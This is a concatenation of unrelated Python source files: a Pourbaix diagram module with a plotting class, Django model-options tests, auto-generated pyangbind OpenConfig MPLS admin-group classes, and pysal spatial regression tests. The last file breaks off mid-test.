def get_hull_energy(self, pH, V):
"""
Gets the minimum energy of the pourbaix "basin" that is formed
from the stable pourbaix planes. Vectorized.
Args:
pH (float or [float]): pH at which to find the hull energy
V (float or [float]): V at which to find the hull energy
Returns:
(float or [float]) minimum pourbaix energy at conditions
"""
all_gs = np.array([e.normalized_energy_at_conditions(pH, V) for e in self.stable_entries])
base = np.min(all_gs, axis=0)
return base
def get_stable_entry(self, pH, V):
"""
Gets the stable entry at a given pH, V condition
Args:
pH (float): pH at a given condition
V (float): V at a given condition
Returns:
(PourbaixEntry or MultiEntry): pourbaix or multi-entry
corresponding ot the minimum energy entry at a given
pH, V condition
"""
all_gs = np.array([e.normalized_energy_at_conditions(pH, V) for e in self.stable_entries])
return self.stable_entries[np.argmin(all_gs)]
@property
def stable_entries(self):
"""
Returns the stable entries in the Pourbaix diagram.
"""
return list(self._stable_domains.keys())
@property
def unstable_entries(self):
"""
Returns all unstable entries in the Pourbaix diagram
"""
return [e for e in self.all_entries if e not in self.stable_entries]
@property
def all_entries(self):
"""
Return all entries used to generate the pourbaix diagram
"""
return self._processed_entries
@property
def unprocessed_entries(self):
"""
Return unprocessed entries
"""
return self._unprocessed_entries
def as_dict(self, include_unprocessed_entries=None):
"""
Args:
include_unprocessed_entries (): DEPRECATED. Whether to include unprocessed
entries (equivalent to filter_solids=False). Serialization now includes
all unprocessed entries by default. Set filter_solids=False before
serializing to include unstable solids from the generated Pourbaix Diagram.
Returns:
MSONable dict.
"""
if include_unprocessed_entries:
warnings.warn(
DeprecationWarning(
"The include_unprocessed_entries kwarg is deprecated! "
"Set filter_solids=True / False before serializing instead."
)
)
d = {
"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"entries": [e.as_dict() for e in self._unprocessed_entries],
"comp_dict": self._elt_comp,
"conc_dict": self._conc_dict,
"filter_solids": self.filter_solids,
}
return d
@classmethod
def from_dict(cls, d):
"""
Args:
d (): Dict representation.
Returns:
PourbaixDiagram
"""
decoded_entries = MontyDecoder().process_decoded(d["entries"])
return cls(decoded_entries, d.get("comp_dict"), d.get("conc_dict"), d.get("filter_solids"))
class PourbaixPlotter:
"""
A plotter class for phase diagrams.
"""
def __init__(self, pourbaix_diagram):
"""
Args:
pourbaix_diagram (PourbaixDiagram): A PourbaixDiagram object.
"""
self._pbx = pourbaix_diagram
def show(self, *args, **kwargs):
"""
Shows the pourbaix plot
Args:
*args: args to get_pourbaix_plot
**kwargs: kwargs to get_pourbaix_plot
Returns:
None
"""
plt = self.get_pourbaix_plot(*args, **kwargs)
plt.show()
def get_pourbaix_plot(self, limits=None, title="", label_domains=True, plt=None):
"""
Plot Pourbaix diagram.
Args:
limits: 2D list containing limits of the Pourbaix diagram
of the form [[xlo, xhi], [ylo, yhi]]
title (str): Title to display on plot
label_domains (bool): whether to label pourbaix domains
plt (pyplot): Pyplot instance for plotting
Returns:
plt (pyplot) - matplotlib plot object with pourbaix diagram
"""
if limits is None:
limits = [[-2, 16], [-3, 3]]
plt = plt or pretty_plot(16)
xlim = limits[0]
ylim = limits[1]
h_line = np.transpose([[xlim[0], -xlim[0] * PREFAC], [xlim[1], -xlim[1] * PREFAC]])
o_line = np.transpose([[xlim[0], -xlim[0] * PREFAC + 1.23], [xlim[1], -xlim[1] * PREFAC + 1.23]])
neutral_line = np.transpose([[7, ylim[0]], [7, ylim[1]]])
V0_line = np.transpose([[xlim[0], 0], [xlim[1], 0]])
ax = plt.gca()
ax.set_xlim(xlim)
ax.set_ylim(ylim)
lw = 3
plt.plot(h_line[0], h_line[1], "r--", linewidth=lw)
plt.plot(o_line[0], o_line[1], "r--", linewidth=lw)
plt.plot(neutral_line[0], neutral_line[1], "k-.", linewidth=lw)
plt.plot(V0_line[0], V0_line[1], "k-.", linewidth=lw)
for entry, vertices in self._pbx._stable_domain_vertices.items():
center = np.average(vertices, axis=0)
x, y = np.transpose(np.vstack([vertices, vertices[0]]))
plt.plot(x, y, "k-", linewidth=lw)
if label_domains:
plt.annotate(
generate_entry_label(entry),
center,
ha="center",
va="center",
fontsize=20,
color="b",
).draggable()
plt.xlabel("pH")
plt.ylabel("E (V)")
plt.title(title, fontsize=20, fontweight="bold")
return plt
def plot_entry_stability(
self,
entry,
pH_range=None,
pH_resolution=100,
V_range=None,
V_resolution=100,
e_hull_max=1,
cmap="RdYlBu_r",
**kwargs,
):
"""
Args:
entry ():
pH_range ():
pH_resolution ():
V_range ():
V_resolution ():
e_hull_max ():
cmap ():
**kwargs ():
Returns:
"""
if pH_range is None:
pH_range = [-2, 16]
if V_range is None:
V_range = [-3, 3]
# plot the Pourbaix diagram
plt = self.get_pourbaix_plot(**kwargs)
pH, V = np.mgrid[
pH_range[0] : pH_range[1] : pH_resolution * 1j,
V_range[0] : V_range[1] : V_resolution * 1j,
]
stability = self._pbx.get_decomposition_energy(entry, pH, V)
# Plot stability map
plt.pcolor(pH, V, stability, cmap=cmap, vmin=0, vmax=e_hull_max)
cbar = plt.colorbar()
cbar.set_label(f"Stability of {generate_entry_label(entry)} (eV/atom)")
# Set ticklabels
# ticklabels = [t.get_text() for t in cbar.ax.get_yticklabels()]
# ticklabels[-1] = '>={}'.format(ticklabels[-1])
# cbar.ax.set_yticklabels(ticklabels)
return plt
def domain_vertices(self, entry):
"""
Returns the vertices of the Pourbaix domain.
Args:
entry: Entry for which domain vertices are desired
Returns:
list of vertices
"""
return self._pbx._stable_domain_vertices[entry]
def generate_entry_label(entry):
"""
Generates a label for the pourbaix plotter
Args:
entry (PourbaixEntry or MultiEntry): entry to get a label for
"""
if isinstance(entry, MultiEntry):
return " + ".join([e.name for e in entry.entry_list])
# TODO - a more elegant solution could be added later to Stringify
# for example, the pattern re.sub(r"([-+][\d\.]*)", r"$^{\1}$", )
# will convert B(OH)4- to B(OH)$_4^-$.
# for this to work, the ion's charge always must be written AFTER
# the sign (e.g., Fe+2 not Fe2+)
string = entry.to_latex_string()
return re.sub(r"()\[([^)]*)\]", r"\1$^{\2}$", string)
| |
from django.apps import apps
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django.core.exceptions import FieldDoesNotExist
from django.db.models.fields import related, CharField, Field
from django.db.models.options import IMMUTABLE_WARNING, EMPTY_RELATION_TREE
from django.test import TestCase
from .models import Relation, AbstractPerson, BasePerson, Person, ProxyPerson, Relating
from .results import TEST_RESULTS
class OptionsBaseTests(TestCase):
def _map_related_query_names(self, res):
return tuple((o.name, m) for o, m in res)
def _map_names(self, res):
return tuple((f.name, m) for f, m in res)
def _model(self, current_model, field):
model = field.model._meta.concrete_model
return None if model == current_model else model
def _details(self, current_model, relation):
direct = isinstance(relation, Field) or isinstance(relation, GenericForeignKey)
model = relation.model._meta.concrete_model
if model == current_model:
model = None
field = relation if direct else relation.field
m2m = isinstance(field, related.ManyToManyField)
return relation, model, direct, m2m
class GetFieldsTests(OptionsBaseTests):
def test_get_fields_is_immutable(self):
msg = IMMUTABLE_WARNING % "get_fields()"
for _ in range(2):
# Running unit test twice to ensure both non-cached and cached result
# are immutable.
fields = Person._meta.get_fields()
with self.assertRaisesMessage(AttributeError, msg):
fields += ["errors"]
class DataTests(OptionsBaseTests):
def test_fields(self):
for model, expected_result in TEST_RESULTS['fields'].items():
fields = model._meta.fields
self.assertEqual([f.attname for f in fields], expected_result)
def test_local_fields(self):
is_data_field = lambda f: isinstance(f, Field) and not isinstance(f, related.ManyToManyField)
for model, expected_result in TEST_RESULTS['local_fields'].items():
fields = model._meta.local_fields
self.assertEqual([f.attname for f in fields], expected_result)
for f in fields:
self.assertEqual(f.model, model)
self.assertTrue(is_data_field(f))
def test_local_concrete_fields(self):
for model, expected_result in TEST_RESULTS['local_concrete_fields'].items():
fields = model._meta.local_concrete_fields
self.assertEqual([f.attname for f in fields], expected_result)
for f in fields:
self.assertIsNotNone(f.column)
class M2MTests(OptionsBaseTests):
def test_many_to_many(self):
for model, expected_result in TEST_RESULTS['many_to_many'].items():
fields = model._meta.many_to_many
self.assertEqual([f.attname for f in fields], expected_result)
for f in fields:
self.assertTrue(f.many_to_many and f.is_relation)
def test_many_to_many_with_model(self):
for model, expected_result in TEST_RESULTS['many_to_many_with_model'].items():
models = [self._model(model, field) for field in model._meta.many_to_many]
self.assertEqual(models, expected_result)
class RelatedObjectsTests(OptionsBaseTests):
key_name = lambda self, r: r[0]
def test_related_objects(self):
result_key = 'get_all_related_objects_with_model'
for model, expected in TEST_RESULTS[result_key].items():
objects = [
(field, self._model(model, field))
for field in model._meta.get_fields()
if field.auto_created and not field.concrete
]
self.assertEqual(self._map_related_query_names(objects), expected)
def test_related_objects_local(self):
result_key = 'get_all_related_objects_with_model_local'
for model, expected in TEST_RESULTS[result_key].items():
objects = [
(field, self._model(model, field))
for field in model._meta.get_fields(include_parents=False)
if field.auto_created and not field.concrete
]
self.assertEqual(self._map_related_query_names(objects), expected)
def test_related_objects_include_hidden(self):
result_key = 'get_all_related_objects_with_model_hidden'
for model, expected in TEST_RESULTS[result_key].items():
objects = [
(field, self._model(model, field))
for field in model._meta.get_fields(include_hidden=True)
if field.auto_created and not field.concrete
]
self.assertEqual(
sorted(self._map_names(objects), key=self.key_name),
sorted(expected, key=self.key_name)
)
def test_related_objects_include_hidden_local_only(self):
result_key = 'get_all_related_objects_with_model_hidden_local'
for model, expected in TEST_RESULTS[result_key].items():
objects = [
(field, self._model(model, field))
for field in model._meta.get_fields(include_hidden=True, include_parents=False)
if field.auto_created and not field.concrete
]
self.assertEqual(
sorted(self._map_names(objects), key=self.key_name),
sorted(expected, key=self.key_name)
)
class VirtualFieldsTests(OptionsBaseTests):
def test_virtual_fields(self):
for model, expected_names in TEST_RESULTS['virtual_fields'].items():
objects = model._meta.virtual_fields
self.assertEqual(sorted([f.name for f in objects]), sorted(expected_names))
class GetFieldByNameTests(OptionsBaseTests):
def test_get_data_field(self):
field_info = self._details(Person, Person._meta.get_field('data_abstract'))
self.assertEqual(field_info[1:], (BasePerson, True, False))
self.assertIsInstance(field_info[0], CharField)
def test_get_m2m_field(self):
field_info = self._details(Person, Person._meta.get_field('m2m_base'))
self.assertEqual(field_info[1:], (BasePerson, True, True))
self.assertIsInstance(field_info[0], related.ManyToManyField)
def test_get_related_object(self):
field_info = self._details(Person, Person._meta.get_field('relating_baseperson'))
self.assertEqual(field_info[1:], (BasePerson, False, False))
self.assertIsInstance(field_info[0], related.ForeignObjectRel)
def test_get_related_m2m(self):
field_info = self._details(Person, Person._meta.get_field('relating_people'))
self.assertEqual(field_info[1:], (None, False, True))
self.assertIsInstance(field_info[0], related.ForeignObjectRel)
def test_get_generic_relation(self):
field_info = self._details(Person, Person._meta.get_field('generic_relation_base'))
self.assertEqual(field_info[1:], (None, True, False))
self.assertIsInstance(field_info[0], GenericRelation)
def test_get_fields_only_searaches_forward_on_apps_not_ready(self):
opts = Person._meta
# If apps registry is not ready, get_field() searches over only
# forward fields.
opts.apps.ready = False
try:
# 'data_abstract' is a forward field, and therefore will be found
self.assertTrue(opts.get_field('data_abstract'))
msg = (
"Person has no field named 'relating_baseperson'. The app "
"cache isn't ready yet, so if this is a forward field, it "
"won't be available yet."
)
# 'data_abstract' is a reverse field, and will raise an exception
with self.assertRaisesMessage(FieldDoesNotExist, msg):
opts.get_field('relating_baseperson')
finally:
opts.apps.ready = True
class RelationTreeTests(TestCase):
all_models = (Relation, AbstractPerson, BasePerson, Person, ProxyPerson, Relating)
def setUp(self):
apps.clear_cache()
def test_clear_cache_clears_relation_tree(self):
# The apps.clear_cache is setUp() should have deleted all trees.
# Exclude abstract models that are not included in the Apps registry
# and have no cache.
all_models_with_cache = (m for m in self.all_models if not m._meta.abstract)
for m in all_models_with_cache:
self.assertNotIn('_relation_tree', m._meta.__dict__)
def test_first_relation_tree_access_populates_all(self):
# On first access, relation tree should have populated cache.
self.assertTrue(self.all_models[0]._meta._relation_tree)
# AbstractPerson does not have any relations, so relation_tree
# should just return an EMPTY_RELATION_TREE.
self.assertEqual(AbstractPerson._meta._relation_tree, EMPTY_RELATION_TREE)
# All the other models should already have their relation tree
# in the internal __dict__ .
all_models_but_abstractperson = (m for m in self.all_models if m is not AbstractPerson)
for m in all_models_but_abstractperson:
self.assertIn('_relation_tree', m._meta.__dict__)
def test_relations_related_objects(self):
# Testing non hidden related objects
self.assertEqual(
sorted([field.related_query_name() for field in Relation._meta._relation_tree
if not field.rel.field.rel.is_hidden()]),
sorted([
'fk_abstract_rel', 'fk_abstract_rel', 'fk_abstract_rel', 'fk_base_rel', 'fk_base_rel',
'fk_base_rel', 'fk_concrete_rel', 'fk_concrete_rel', 'fo_abstract_rel', 'fo_abstract_rel',
'fo_abstract_rel', 'fo_base_rel', 'fo_base_rel', 'fo_base_rel', 'fo_concrete_rel',
'fo_concrete_rel', 'm2m_abstract_rel', 'm2m_abstract_rel', 'm2m_abstract_rel',
'm2m_base_rel', 'm2m_base_rel', 'm2m_base_rel', 'm2m_concrete_rel', 'm2m_concrete_rel',
])
)
# Testing hidden related objects
self.assertEqual(
sorted([field.related_query_name() for field in BasePerson._meta._relation_tree]),
sorted([
'+', '+', 'BasePerson_following_abstract+', 'BasePerson_following_abstract+',
'BasePerson_following_base+', 'BasePerson_following_base+', 'BasePerson_friends_abstract+',
'BasePerson_friends_abstract+', 'BasePerson_friends_base+', 'BasePerson_friends_base+',
'BasePerson_m2m_abstract+', 'BasePerson_m2m_base+', 'Relating_basepeople+',
'Relating_basepeople_hidden+', 'followers_abstract', 'followers_abstract', 'followers_abstract',
'followers_base', 'followers_base', 'followers_base', 'friends_abstract_rel_+', 'friends_abstract_rel_+',
'friends_abstract_rel_+', 'friends_base_rel_+', 'friends_base_rel_+', 'friends_base_rel_+', 'person',
'person', 'relating_basepeople', 'relating_baseperson',
])
)
self.assertEqual([field.related_query_name() for field in AbstractPerson._meta._relation_tree], [])
| |
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import admin_group
class mpls_admin_groups(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/mpls/te-global-attributes/mpls-admin-groups. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Top-level container for admin-groups configuration
and state
"""
__slots__ = ("_path_helper", "_extmethods", "__admin_group")
_yang_name = "mpls-admin-groups"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__admin_group = YANGDynClass(
base=YANGListType(
"admin_group_name",
admin_group.admin_group,
yang_name="admin-group",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="admin-group-name",
extensions=None,
),
is_container="list",
yang_name="admin-group",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="list",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"mpls",
"te-global-attributes",
"mpls-admin-groups",
]
def _get_admin_group(self):
"""
Getter method for admin_group, mapped from YANG variable /network_instances/network_instance/mpls/te_global_attributes/mpls_admin_groups/admin_group (list)
YANG Description: configuration of value to name mapping
for mpls affinities/admin-groups
"""
return self.__admin_group
def _set_admin_group(self, v, load=False):
"""
Setter method for admin_group, mapped from YANG variable /network_instances/network_instance/mpls/te_global_attributes/mpls_admin_groups/admin_group (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_admin_group is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_admin_group() directly.
YANG Description: configuration of value to name mapping
for mpls affinities/admin-groups
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGListType(
"admin_group_name",
admin_group.admin_group,
yang_name="admin-group",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="admin-group-name",
extensions=None,
),
is_container="list",
yang_name="admin-group",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="list",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """admin_group must be of a type compatible with list""",
"defined-type": "list",
"generated-type": """YANGDynClass(base=YANGListType("admin_group_name",admin_group.admin_group, yang_name="admin-group", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='admin-group-name', extensions=None), is_container='list', yang_name="admin-group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='list', is_config=True)""",
}
)
self.__admin_group = t
if hasattr(self, "_set"):
self._set()
def _unset_admin_group(self):
self.__admin_group = YANGDynClass(
base=YANGListType(
"admin_group_name",
admin_group.admin_group,
yang_name="admin-group",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="admin-group-name",
extensions=None,
),
is_container="list",
yang_name="admin-group",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="list",
is_config=True,
)
admin_group = __builtin__.property(_get_admin_group, _set_admin_group)
_pyangbind_elements = OrderedDict([("admin_group", admin_group)])
from . import admin_group
class mpls_admin_groups(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/mpls/te-global-attributes/mpls-admin-groups. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Top-level container for admin-groups configuration
and state
"""
__slots__ = ("_path_helper", "_extmethods", "__admin_group")
_yang_name = "mpls-admin-groups"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__admin_group = YANGDynClass(
base=YANGListType(
"admin_group_name",
admin_group.admin_group,
yang_name="admin-group",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="admin-group-name",
extensions=None,
),
is_container="list",
yang_name="admin-group",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="list",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"mpls",
"te-global-attributes",
"mpls-admin-groups",
]
def _get_admin_group(self):
"""
Getter method for admin_group, mapped from YANG variable /network_instances/network_instance/mpls/te_global_attributes/mpls_admin_groups/admin_group (list)
YANG Description: configuration of value to name mapping
for mpls affinities/admin-groups
"""
return self.__admin_group
def _set_admin_group(self, v, load=False):
"""
Setter method for admin_group, mapped from YANG variable /network_instances/network_instance/mpls/te_global_attributes/mpls_admin_groups/admin_group (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_admin_group is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_admin_group() directly.
YANG Description: configuration of value to name mapping
for mpls affinities/admin-groups
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGListType(
"admin_group_name",
admin_group.admin_group,
yang_name="admin-group",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="admin-group-name",
extensions=None,
),
is_container="list",
yang_name="admin-group",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="list",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """admin_group must be of a type compatible with list""",
"defined-type": "list",
"generated-type": """YANGDynClass(base=YANGListType("admin_group_name",admin_group.admin_group, yang_name="admin-group", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='admin-group-name', extensions=None), is_container='list', yang_name="admin-group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='list', is_config=True)""",
}
)
self.__admin_group = t
if hasattr(self, "_set"):
self._set()
def _unset_admin_group(self):
self.__admin_group = YANGDynClass(
base=YANGListType(
"admin_group_name",
admin_group.admin_group,
yang_name="admin-group",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="admin-group-name",
extensions=None,
),
is_container="list",
yang_name="admin-group",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="list",
is_config=True,
)
admin_group = __builtin__.property(_get_admin_group, _set_admin_group)
_pyangbind_elements = OrderedDict([("admin_group", admin_group)])
| |
import unittest
import pysal
import numpy as np
from pysal.spreg import error_sp as SP
from scipy import sparse
class TestBaseGMError(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
X.append(db.by_col("CRIME"))
self.X = np.array(X).T
self.X = np.hstack((np.ones(self.y.shape),self.X))
self.X = sparse.csr_matrix(self.X)
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
reg = SP.BaseGM_Error(self.y, self.X, self.w.sparse)
betas = np.array([[ 47.94371455], [ 0.70598088], [ -0.55571746], [ 0.37230161]])
np.testing.assert_array_almost_equal(reg.betas,betas,6)
u = np.array([ 27.4739775])
np.testing.assert_array_almost_equal(reg.u[0],u,6)
predy = np.array([ 52.9930255])
np.testing.assert_array_almost_equal(reg.predy[0],predy,6)
n = 49
self.assertAlmostEqual(reg.n,n,6)
k = 3
self.assertAlmostEqual(reg.k,k,6)
y = np.array([ 80.467003])
np.testing.assert_array_almost_equal(reg.y[0],y,6)
x = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_array_almost_equal(reg.x.toarray()[0],x,6)
e = np.array([ 31.89620319])
np.testing.assert_array_almost_equal(reg.e_filtered[0],e,6)
predy = np.array([ 52.9930255])
np.testing.assert_array_almost_equal(reg.predy[0],predy,6)
my = 38.43622446938776
self.assertAlmostEqual(reg.mean_y,my)
sy = 18.466069465206047
self.assertAlmostEqual(reg.std_y,sy)
vm = np.array([[ 1.51884943e+02, -5.37622793e+00, -1.86970286e+00], [ -5.37622793e+00, 2.48972661e-01, 5.26564244e-02], [ -1.86970286e+00, 5.26564244e-02, 3.18930650e-02]])
np.testing.assert_array_almost_equal(reg.vm,vm,6)
sig2 = 191.73716465732355
self.assertAlmostEqual(reg.sig2,sig2,5)
class TestGMError(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
X.append(db.by_col("CRIME"))
self.X = np.array(X).T
self.X = sparse.csr_matrix(self.X)
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
reg = SP.GM_Error(self.y, self.X, self.w)
betas = np.array([[ 47.94371455], [ 0.70598088], [ -0.55571746], [ 0.37230161]])
np.testing.assert_array_almost_equal(reg.betas,betas,6)
u = np.array([ 27.4739775])
np.testing.assert_array_almost_equal(reg.u[0],u,6)
predy = np.array([ 52.9930255])
np.testing.assert_array_almost_equal(reg.predy[0],predy,6)
n = 49
self.assertAlmostEqual(reg.n,n,6)
k = 3
self.assertAlmostEqual(reg.k,k,6)
y = np.array([ 80.467003])
np.testing.assert_array_almost_equal(reg.y[0],y,6)
x = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_array_almost_equal(reg.x.toarray()[0],x,6)
e = np.array([ 31.89620319])
np.testing.assert_array_almost_equal(reg.e_filtered[0],e,6)
predy = np.array([ 52.9930255])
np.testing.assert_array_almost_equal(reg.predy[0],predy,6)
my = 38.43622446938776
self.assertAlmostEqual(reg.mean_y,my)
sy = 18.466069465206047
self.assertAlmostEqual(reg.std_y,sy)
vm = np.array([[ 1.51884943e+02, -5.37622793e+00, -1.86970286e+00], [ -5.37622793e+00, 2.48972661e-01, 5.26564244e-02], [ -1.86970286e+00, 5.26564244e-02, 3.18930650e-02]])
np.testing.assert_array_almost_equal(reg.vm,vm,6)
sig2 = 191.73716465732355
self.assertAlmostEqual(reg.sig2,sig2,5)
pr2 = 0.3495097406012179
self.assertAlmostEqual(reg.pr2,pr2)
std_err = np.array([ 12.32416094, 0.4989716 , 0.1785863 ])
np.testing.assert_array_almost_equal(reg.std_err,std_err,6)
z_stat = np.array([[ 3.89022140e+00, 1.00152805e-04], [ 1.41487186e+00, 1.57106070e-01], [ -3.11175868e+00, 1.85976455e-03]])
np.testing.assert_array_almost_equal(reg.z_stat,z_stat,6)
class TestBaseGMEndogError(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
self.X = np.array(X).T
self.X = np.hstack((np.ones(self.y.shape),self.X))
self.X = sparse.csr_matrix(self.X)
yd = []
yd.append(db.by_col("CRIME"))
self.yd = np.array(yd).T
q = []
q.append(db.by_col("DISCBD"))
self.q = np.array(q).T
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
reg = SP.BaseGM_Endog_Error(self.y, self.X, self.yd, self.q, self.w.sparse)
betas = np.array([[ 55.36095292], [ 0.46411479], [ -0.66883535], [ 0.38989939]])
np.testing.assert_array_almost_equal(reg.betas,betas,6)
u = np.array([ 26.55951566])
np.testing.assert_array_almost_equal(reg.u[0],u,6)
e = np.array([ 31.23925425])
np.testing.assert_array_almost_equal(reg.e_filtered[0],e,6)
predy = np.array([ 53.9074875])
np.testing.assert_array_almost_equal(reg.predy[0],predy,6)
n = 49
self.assertAlmostEqual(reg.n,n)
k = 3
self.assertAlmostEqual(reg.k,k)
y = np.array([ 80.467003])
np.testing.assert_array_almost_equal(reg.y[0],y,6)
x = np.array([ 1. , 19.531])
np.testing.assert_array_almost_equal(reg.x.toarray()[0],x,6)
yend = np.array([ 15.72598])
np.testing.assert_array_almost_equal(reg.yend[0],yend,6)
z = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_array_almost_equal(reg.z.toarray()[0],z,6)
my = 38.43622446938776
self.assertAlmostEqual(reg.mean_y,my)
#std_y
sy = 18.466069465206047
self.assertAlmostEqual(reg.std_y,sy)
#vm
vm = np.array([[ 529.15644447, -15.78333817, -8.38016887],
[ -15.78333817, 0.54023465, 0.2311196 ],
[ -8.38016887, 0.2311196 , 0.14497647]])
np.testing.assert_array_almost_equal(reg.vm,vm,5)
sig2 = 192.50040382591442
self.assertAlmostEqual(reg.sig2,sig2,5)
class TestGMEndogError(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
self.X = np.array(X).T
self.X = sparse.csr_matrix(self.X)
yd = []
yd.append(db.by_col("CRIME"))
self.yd = np.array(yd).T
q = []
q.append(db.by_col("DISCBD"))
self.q = np.array(q).T
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
reg = SP.GM_Endog_Error(self.y, self.X, self.yd, self.q, self.w)
betas = np.array([[ 55.36095292], [ 0.46411479], [ -0.66883535], [ 0.38989939]])
np.testing.assert_array_almost_equal(reg.betas,betas,6)
u = np.array([ 26.55951566])
np.testing.assert_array_almost_equal(reg.u[0],u,6)
e = np.array([ 31.23925425])
np.testing.assert_array_almost_equal(reg.e_filtered[0],e,6)
predy = np.array([ 53.9074875])
np.testing.assert_array_almost_equal(reg.predy[0],predy,6)
n = 49
self.assertAlmostEqual(reg.n,n)
k = 3
self.assertAlmostEqual(reg.k,k)
y = np.array([ 80.467003])
